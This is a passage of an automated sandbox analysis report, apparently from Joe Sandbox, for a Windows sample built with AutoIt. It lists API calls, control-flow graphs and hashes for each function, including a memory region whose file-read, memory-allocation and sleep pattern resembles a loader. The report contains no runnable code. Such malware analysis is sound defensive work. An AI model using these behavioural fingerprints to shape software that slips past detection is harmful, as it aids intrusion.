                                                                                • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 003E5F47
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 003E5F6A
                                                                                • __dosmaperr.LIBCMT ref: 003E5F73
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 003E5F7C
                                                                                • __set_osfhnd.LIBCMT ref: 003E5FAC
                                                                                • __lseeki64_nolock.LIBCMT ref: 003E6016
                                                                                • __close_nolock.LIBCMT ref: 003E603C
                                                                                • __chsize_nolock.LIBCMT ref: 003E606C
                                                                                • __lseeki64_nolock.LIBCMT ref: 003E607E
                                                                                • __lseeki64_nolock.LIBCMT ref: 003E6176
                                                                                • __lseeki64_nolock.LIBCMT ref: 003E618B
                                                                                • __close_nolock.LIBCMT ref: 003E61EB
                                                                                  • Part of subcall function 003DEA9C: CloseHandle.KERNELBASE(00000000,0045EEF4,00000000,?,003E6041,0045EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003DEAEC
                                                                                  • Part of subcall function 003DEA9C: GetLastError.KERNEL32(?,003E6041,0045EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003DEAF6
                                                                                  • Part of subcall function 003DEA9C: __free_osfhnd.LIBCMT ref: 003DEB03
                                                                                  • Part of subcall function 003DEA9C: __dosmaperr.LIBCMT ref: 003DEB25
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                • __lseeki64_nolock.LIBCMT ref: 003E620D
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 003E6342
                                                                                • ___createFile.LIBCMT ref: 003E6361
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003E636E
                                                                                • __dosmaperr.LIBCMT ref: 003E6375
                                                                                • __free_osfhnd.LIBCMT ref: 003E6395
                                                                                • __invoke_watson.LIBCMT ref: 003E63C3
                                                                                • __wsopen_helper.LIBCMT ref: 003E63DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                • String ID: @
                                                                                • API String ID: 3896587723-2766056989
                                                                                • Opcode ID: e8f0fa2173b1795a17febc34c22d4bac76b63666d09fb5a1d716649b79acadaf
                                                                                • Instruction ID: 4fc0645254dd4650c2dcec5f1e796a245c260ef40b4feef1f9c1aff159248c85
                                                                                • Opcode Fuzzy Hash: e8f0fa2173b1795a17febc34c22d4bac76b63666d09fb5a1d716649b79acadaf
                                                                                • Instruction Fuzzy Hash: EC2288719006A99FEF279F6ADC46BFE7B21EB20368F254329E5219B2D1C3358D40C791
                                                                                Function 003FFA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • _wcscpy.LIBCMT ref: 003FFA96
                                                                                • _wcschr.LIBCMT ref: 003FFAA4
                                                                                • _wcscpy.LIBCMT ref: 003FFABB
                                                                                • _wcscat.LIBCMT ref: 003FFACA
                                                                                • _wcscat.LIBCMT ref: 003FFAE8
                                                                                • _wcscpy.LIBCMT ref: 003FFB09
                                                                                • __wsplitpath.LIBCMT ref: 003FFBE6
                                                                                • _wcscpy.LIBCMT ref: 003FFC0B
                                                                                • _wcscpy.LIBCMT ref: 003FFC1D
                                                                                • _wcscpy.LIBCMT ref: 003FFC32
                                                                                • _wcscat.LIBCMT ref: 003FFC47
                                                                                • _wcscat.LIBCMT ref: 003FFC59
                                                                                • _wcscat.LIBCMT ref: 003FFC6E
                                                                                  • Part of subcall function 003FBFA4: _wcscmp.LIBCMT ref: 003FC03E
                                                                                  • Part of subcall function 003FBFA4: __wsplitpath.LIBCMT ref: 003FC083
                                                                                  • Part of subcall function 003FBFA4: _wcscpy.LIBCMT ref: 003FC096
                                                                                  • Part of subcall function 003FBFA4: _wcscat.LIBCMT ref: 003FC0A9
                                                                                  • Part of subcall function 003FBFA4: __wsplitpath.LIBCMT ref: 003FC0CE
                                                                                  • Part of subcall function 003FBFA4: _wcscat.LIBCMT ref: 003FC0E4
                                                                                  • Part of subcall function 003FBFA4: _wcscat.LIBCMT ref: 003FC0F7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                • String ID: >>>AUTOIT SCRIPT<<<$t2F
                                                                                • API String ID: 2955681530-332902988
                                                                                • Opcode ID: 63a9371033c15376daee46d1fb00d9ee6c48996927c369dd3532ffa03e31c7a3
                                                                                • Instruction ID: 6843ae42aced29bb832f27acd9d0f7e9d1ef63d52e7f93614d964024ef5114c8
                                                                                • Opcode Fuzzy Hash: 63a9371033c15376daee46d1fb00d9ee6c48996927c369dd3532ffa03e31c7a3
                                                                                • Instruction Fuzzy Hash: 8891B272504305AFDB12EF54C851FABB3E8BF44714F04486AFA599F2A1DB30EA44CB92
                                                                                Function 003FBFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 003FBDB4: __time64.LIBCMT ref: 003FBDBE
                                                                                  • Part of subcall function 003B4517: _fseek.LIBCMT ref: 003B452F
                                                                                • __wsplitpath.LIBCMT ref: 003FC083
                                                                                  • Part of subcall function 003D1DFC: __wsplitpath_helper.LIBCMT ref: 003D1E3C
                                                                                • _wcscpy.LIBCMT ref: 003FC096
                                                                                • _wcscat.LIBCMT ref: 003FC0A9
                                                                                • __wsplitpath.LIBCMT ref: 003FC0CE
                                                                                • _wcscat.LIBCMT ref: 003FC0E4
                                                                                • _wcscat.LIBCMT ref: 003FC0F7
                                                                                • _wcscmp.LIBCMT ref: 003FC03E
                                                                                  • Part of subcall function 003FC56D: _wcscmp.LIBCMT ref: 003FC65D
                                                                                  • Part of subcall function 003FC56D: _wcscmp.LIBCMT ref: 003FC670
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003FC2A1
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003FC338
                                                                                • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003FC34E
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003FC35F
                                                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003FC371
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                • String ID: p1Wu`KXu
                                                                                • API String ID: 2378138488-4063981602
                                                                                • Opcode ID: 74fb627f902787fb4d56de7fb76c40701ef4e54d8cbea78949a93de9f54dc043
                                                                                • Instruction ID: 3631239b2562e39f104af2a685018b2b1e94bafe89a7f93dba11f253ae30b73c
                                                                                • Opcode Fuzzy Hash: 74fb627f902787fb4d56de7fb76c40701ef4e54d8cbea78949a93de9f54dc043
                                                                                • Instruction Fuzzy Hash: 55C139B2D4021DABCF16DF95DD81EEEB7BDAF49300F0040AAF609EA151DB309A448F65
                                                                                Function 003B3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 003B3F86
                                                                                • RegisterClassExW.USER32(00000030), ref: 003B3FB0
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003B3FC1
                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 003B3FDE
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003B3FEE
                                                                                • LoadIconW.USER32(000000A9), ref: 003B4004
                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003B4013
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                • API String ID: 2914291525-1005189915
                                                                                • Opcode ID: bee5ab7fc79f76d14756f6aa6edc60f4b092fe42f722c16d1849ad6fa70a577a
                                                                                • Instruction ID: 7b1a70707bd2e57b6bd3b080bcc8f785dc251fd87a641f981e56c556cef2949c
                                                                                • Opcode Fuzzy Hash: bee5ab7fc79f76d14756f6aa6edc60f4b092fe42f722c16d1849ad6fa70a577a
                                                                                • Instruction Fuzzy Hash: BC21D8B5D00358AFDB00DFA8EC89BCDBBB4FB08714F00512AF525A62A0D7B54584CF99
                                                                                Function 003B3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 962 3b3742-3b3762 964 3b37c2-3b37c4 962->964 965 3b3764-3b3767 962->965 964->965 966 3b37c6 964->966 967 3b3769-3b3770 965->967 968 3b37c8 965->968 969 3b37ab-3b37b3 DefWindowProcW 966->969 972 3b382c-3b3834 PostQuitMessage 967->972 973 3b3776-3b377b 967->973 970 421e00-421e2e call 3b2ff6 call 3ce312 968->970 971 3b37ce-3b37d1 968->971 974 3b37b9-3b37bf 969->974 1009 421e33-421e3a 970->1009 975 3b37d3-3b37d4 971->975 976 3b37f6-3b381d SetTimer RegisterWindowMessageW 971->976 980 3b37f2-3b37f4 972->980 978 421e88-421e9c call 3f4ddd 973->978 979 3b3781-3b3783 973->979 981 421da3-421da6 975->981 982 3b37da-3b37ed KillTimer call 3b3847 call 3b390f 975->982 976->980 984 3b381f-3b382a CreatePopupMenu 976->984 978->980 1004 421ea2 978->1004 985 3b3789-3b378e 979->985 986 3b3836-3b3845 call 3ceb83 979->986 980->974 988 421da8-421daa 981->988 989 421ddc-421dfb MoveWindow 981->989 982->980 984->980 992 421e6d-421e74 985->992 993 3b3794-3b3799 985->993 986->980 997 421dcb-421dd7 SetFocus 988->997 998 421dac-421daf 988->998 989->980 992->969 1000 421e7a-421e83 call 3ea5f3 992->1000 1002 3b379f-3b37a5 993->1002 1003 421e58-421e68 call 3f55bd 993->1003 997->980 998->1002 1005 421db5-421dc6 call 3b2ff6 998->1005 1000->969 1002->969 1002->1009 1003->980 1004->969 1005->980 1009->969 1010 421e40-421e53 call 3b3847 call 3b4ffc 1009->1010 1010->969
                                                                                APIs
                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 003B37B3
                                                                                • KillTimer.USER32(?,00000001), ref: 003B37DD
                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003B3800
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003B380B
                                                                                • CreatePopupMenu.USER32 ref: 003B381F
                                                                                • PostQuitMessage.USER32(00000000), ref: 003B382E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                • String ID: TaskbarCreated
                                                                                • API String ID: 129472671-2362178303
                                                                                • Opcode ID: 70e14273464763a8d792d670243f4f3fded32a41ecbb46b95215b3ea02c648dd
                                                                                • Instruction ID: 2de1428a5f18041205f9f48b2ace12f2391cbb259a6585216984e54a4549dee7
                                                                                • Opcode Fuzzy Hash: 70e14273464763a8d792d670243f4f3fded32a41ecbb46b95215b3ea02c648dd
                                                                                • Instruction Fuzzy Hash: 1F4155F52002A5ABDB165F6CAC4BBFA3659FB00304F404126F716D6DB0CF649E80836A
                                                                                Function 003B3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 003B3E79
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 003B3E88
                                                                                • LoadIconW.USER32(00000063), ref: 003B3E9E
                                                                                • LoadIconW.USER32(000000A4), ref: 003B3EB0
                                                                                • LoadIconW.USER32(000000A2), ref: 003B3EC2
                                                                                  • Part of subcall function 003B4024: LoadImageW.USER32(003B0000,00000063,00000001,00000010,00000010,00000000), ref: 003B4048
                                                                                • RegisterClassExW.USER32(?), ref: 003B3F30
                                                                                  • Part of subcall function 003B3F53: GetSysColorBrush.USER32(0000000F), ref: 003B3F86
                                                                                  • Part of subcall function 003B3F53: RegisterClassExW.USER32(00000030), ref: 003B3FB0
                                                                                  • Part of subcall function 003B3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003B3FC1
                                                                                  • Part of subcall function 003B3F53: InitCommonControlsEx.COMCTL32(?), ref: 003B3FDE
                                                                                  • Part of subcall function 003B3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003B3FEE
                                                                                  • Part of subcall function 003B3F53: LoadIconW.USER32(000000A9), ref: 003B4004
                                                                                  • Part of subcall function 003B3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003B4013
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                • String ID: #$0$AutoIt v3
                                                                                • API String ID: 423443420-4155596026
                                                                                • Opcode ID: 4a0397da6b922feb49e07ddb068179e8f479e5f6374a86dc6c1cd1e38baa736d
                                                                                • Instruction ID: f3edb5cdc6f32a303f0588e424c8041d695e90b40bff58d2fc0dde917b19aeb0
                                                                                • Opcode Fuzzy Hash: 4a0397da6b922feb49e07ddb068179e8f479e5f6374a86dc6c1cd1e38baa736d
                                                                                • Instruction Fuzzy Hash: 5E2159B0E00354ABCB11DFADEC4AA99BBF5FB48314F50413AE218A62B1D7754680DF99
                                                                                Function 01009B30 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1026 1009b30-1009bde call 10074f0 1029 1009be5-1009c0b call 100aa40 CreateFileW 1026->1029 1032 1009c12-1009c22 1029->1032 1033 1009c0d 1029->1033 1038 1009c24 1032->1038 1039 1009c29-1009c43 VirtualAlloc 1032->1039 1034 1009d5d-1009d61 1033->1034 1036 1009da3-1009da6 1034->1036 1037 1009d63-1009d67 1034->1037 1040 1009da9-1009db0 1036->1040 1041 1009d73-1009d77 1037->1041 1042 1009d69-1009d6c 1037->1042 1038->1034 1043 1009c45 1039->1043 1044 1009c4a-1009c61 ReadFile 1039->1044 1045 1009db2-1009dbd 1040->1045 1046 1009e05-1009e1a 1040->1046 1047 1009d87-1009d8b 1041->1047 1048 1009d79-1009d83 1041->1048 1042->1041 1043->1034 1053 1009c63 1044->1053 1054 1009c68-1009ca8 VirtualAlloc 1044->1054 1055 1009dc1-1009dcd 1045->1055 1056 1009dbf 1045->1056 1049 1009e2a-1009e32 1046->1049 1050 1009e1c-1009e27 VirtualFree 1046->1050 1051 1009d9b 1047->1051 1052 1009d8d-1009d97 1047->1052 1048->1047 1050->1049 1051->1036 1052->1051 1053->1034 1057 1009caa 1054->1057 1058 1009caf-1009cca call 100ac90 1054->1058 1059 1009de1-1009ded 1055->1059 1060 1009dcf-1009ddf 1055->1060 1056->1046 1057->1034 1066 1009cd5-1009cdf 1058->1066 1063 1009dfa-1009e00 1059->1063 1064 1009def-1009df8 1059->1064 1062 1009e03 1060->1062 1062->1040 1063->1062 1064->1062 1067 1009ce1-1009d10 call 100ac90 1066->1067 1068 1009d12-1009d26 call 100aaa0 1066->1068 1067->1066 1074 1009d28 1068->1074 1075 1009d2a-1009d2e 1068->1075 1074->1034 1076 1009d30-1009d34 CloseHandle 1075->1076 1077 1009d3a-1009d3e 1075->1077 1076->1077 1078 1009d40-1009d4b VirtualFree 1077->1078 1079 1009d4e-1009d57 1077->1079 1078->1079 1079->1029 1079->1034
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01009C01
                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01009E27
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1445160018.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1007000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileFreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 204039940-0
                                                                                • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                                                • Instruction ID: f62ca573bae5c04a77629ae2d7e91cfde51c6eefdc3d64e6d86bbc1a1e89b4d2
                                                                                • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                                                • Instruction Fuzzy Hash: FDA11A70E40209EBEB15DF94C894BEEBBB5BF48308F108599E245BB2C1D7759A40CF54
                                                                                Function 003B49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1135 3b49fb-3b4a25 call 3bbcce RegOpenKeyExW 1138 3b4a2b-3b4a2f 1135->1138 1139 4241cc-4241e3 RegQueryValueExW 1135->1139 1140 424246-42424f RegCloseKey 1139->1140 1141 4241e5-424222 call 3cf4ea call 3b47b7 RegQueryValueExW 1139->1141 1146 424224-42423b call 3b6a63 1141->1146 1147 42423d-424245 call 3b47e2 1141->1147 1146->1147 1147->1140
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 003B4A1D
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004241DB
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0042421A
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00424249
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue$CloseOpen
                                                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                • API String ID: 1586453840-614718249
                                                                                • Opcode ID: f823952dc57c93204f7eacd715c170272ae4ba20d9ff76989721d99e39530150
                                                                                • Instruction ID: ed38d11c97c25a935fc025f78d7638c7dedfea6ec1be06e996262740c155ad32
                                                                                • Opcode Fuzzy Hash: f823952dc57c93204f7eacd715c170272ae4ba20d9ff76989721d99e39530150
                                                                                • Instruction Fuzzy Hash: 4A116D71A00108BEEB05ABA4DD86EFF7BBCEF04748F100069B502D6191EA749E01D754
                                                                                Function 003B36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1162 3b36b8-3b3728 CreateWindowExW * 2 ShowWindow * 2
                                                                                APIs
                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003B36E6
                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003B3707
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,003B3AA3,?), ref: 003B371B
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,003B3AA3,?), ref: 003B3724
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateShow
                                                                                • String ID: AutoIt v3$edit
                                                                                • API String ID: 1584632944-3779509399
                                                                                • Opcode ID: 653316fd9acf6ff69db12021cf84a82d15bae3ca3306583579354764ca5bfc08
                                                                                • Instruction ID: 12dcaa157ecbdf540210e4fc1a6228b6f66cb6672d2f63ab1ce154d2b9cfd09a
                                                                                • Opcode Fuzzy Hash: 653316fd9acf6ff69db12021cf84a82d15bae3ca3306583579354764ca5bfc08
                                                                                • Instruction Fuzzy Hash: E5F0FE719402D07AE731676BAC49E773E7DD7C6F20F00403FBA08A25B0C66508D5DAB9
                                                                                Function 010098A0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 167fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1267 10098a0-1009a30 call 10074f0 call 1009790 CreateFileW 1274 1009a32 1267->1274 1275 1009a37-1009a47 1267->1275 1276 1009aea-1009aef 1274->1276 1278 1009a49 1275->1278 1279 1009a4e-1009a68 VirtualAlloc 1275->1279 1278->1276 1280 1009a6a 1279->1280 1281 1009a6c-1009a86 ReadFile 1279->1281 1280->1276 1282 1009a88 1281->1282 1283 1009a8a-1009ac4 call 10097d0 call 1008790 1281->1283 1282->1276 1288 1009ae0-1009ae8 ExitProcess 1283->1288 1289 1009ac6-1009adb call 1009820 1283->1289 1288->1276 1289->1288
                                                                                APIs
                                                                                  • Part of subcall function 01009790: Sleep.KERNELBASE(000001F4), ref: 010097A1
                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01009A23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1445160018.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1007000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileSleep
                                                                                • String ID: H0NXFDJ7Q57GHFRIIHUXJMC668E
                                                                                • API String ID: 2694422964-3801579314
                                                                                • Opcode ID: be27c86057938952499a7e8dc8b2a83062a1872b939542fbb252d8a4bd681578
                                                                                • Instruction ID: afd16ce8efab1c10c97789d996b11a52036b6e34b88ba768b351d947d946aec9
                                                                                • Opcode Fuzzy Hash: be27c86057938952499a7e8dc8b2a83062a1872b939542fbb252d8a4bd681578
                                                                                • Instruction Fuzzy Hash: 86717370D04288DAEF12DBE4C854BEEBB75AF19304F044099D248BB2C1D7BA0B45CBA6
                                                                                Function 003B4A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
